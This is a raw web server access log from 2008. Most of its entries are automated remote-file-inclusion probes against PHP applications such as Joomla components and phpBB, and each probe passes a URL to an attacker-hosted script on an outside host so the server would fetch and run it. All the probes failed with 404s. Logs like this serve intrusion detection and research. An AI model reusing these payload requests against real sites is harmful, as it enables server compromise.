216.127.86.119 - - [27/Mar/2008:08:28:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:28:30 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:28:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:28:31 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:08:28:40 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:08:28:41 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?file=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.152 - - [27/Mar/2008:08:28:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.105 - - [27/Mar/2008:08:28:46 -0700] "GET /tmp/?N=D HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:08:29:12 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:08:29:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:08:29:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:08:29:14 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:29:42 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:29:42 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:29:43 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:29:58 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.155 - - [27/Mar/2008:08:30:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.100 - - [27/Mar/2008:08:30:19 -0700] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:08:30:29 -0700] "GET /logs/access_080216.log/main.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:08:30:30 -0700] "GET /main.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:08:30:30 -0700] "GET /logs/main.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:30:35 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:30:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:30:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:30:37 -0700] "GET /logs/access_080124.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:30:56 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:30:56 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:08:30:57 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:08:31:06 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:08:31:12 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:31:19 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:31:19 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:31:20 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:31:27 -0700] "GET /logs/access_080219.log/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:31:27 -0700] "GET /newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:31:27 -0700] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:31:28 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:31:28 -0700] "GET //skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:31:28 -0700] "GET /logs//skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:31:29 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:31:29 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:31:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:31:46 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:31:46 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:31:46 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:08:31:49 -0700] "GET //mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:08:32:00 -0700] "GET /logs/access.log//index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:08:32:01 -0700] "GET //index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:08:32:01 -0700] "GET /logs//index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:32:18 -0700] "GET /logs/access_080223.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:32:21 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:32:21 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:32:32 -0700] "GET /logs/access_080223.log/oneadmin/linksdir/samplelinksdir.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:32:33 -0700] "GET /oneadmin/linksdir/samplelinksdir.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:32:33 -0700] "GET /logs/oneadmin/linksdir/samplelinksdir.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:32:42 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:32:42 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:32:42 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:33:11 -0700] "GET /logs/access_080219.log/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:33:12 -0700] "GET /newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:33:12 -0700] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:08:33:19 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:33:34 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:33:35 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:33:35 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:34:19 -0700] "GET /logs/access_080213.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:34:20 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:34:20 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:34:24 -0700] "GET /logs/access_080219.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:34:25 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:34:25 -0700] "GET /logs//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:34:43 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:08:34:45 -0700] "GET /logs/access_080218.log//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:08:34:48 -0700] "GET //index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:08:34:52 -0700] "GET /logs//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:35:02 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:08:35:04 -0700] "GET /logs/access_071227.log//skin/zero_vote/error.php?file=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:35:08 -0700] "GET /logs/access_080225.log/oneadmin/linksdir/samplelinksdir.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:35:17 -0700] "GET /logs/access_080312.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:36:06 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:36:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:36:17 -0700] "GET /logs/access_080219.log/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:36:18 -0700] "GET /newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:36:19 -0700] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.162.47 - - [27/Mar/2008:08:36:24 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.162.47 - - [27/Mar/2008:08:36:24 -0700] "GET /mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.162.47 - - [27/Mar/2008:08:36:24 -0700] "GET /logs/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:36:25 -0700] "GET /logs/access_080218.log/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:36:25 -0700] "GET /index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:36:25 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:36:28 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:36:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:36:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:31 -0700] "GET /logs/access_080213.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.40.38.11 - - [27/Mar/2008:08:36:39 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
12.40.38.11 - - [27/Mar/2008:08:36:39 -0700] "GET /presto/ HTTP/1.0" 200 510 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:41 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:42 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:08:36:42 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:08:37:07 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:08:37:07 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:37:20 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:37:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:37:24 -0700] "GET /logs/access_080218.log/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:37:24 -0700] "GET /index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.239.160.112 - - [27/Mar/2008:08:37:24 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:08:37:31 -0700] "GET /logs/access_080207.log//modules/Neos_Chronos/header.php?base_folder=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
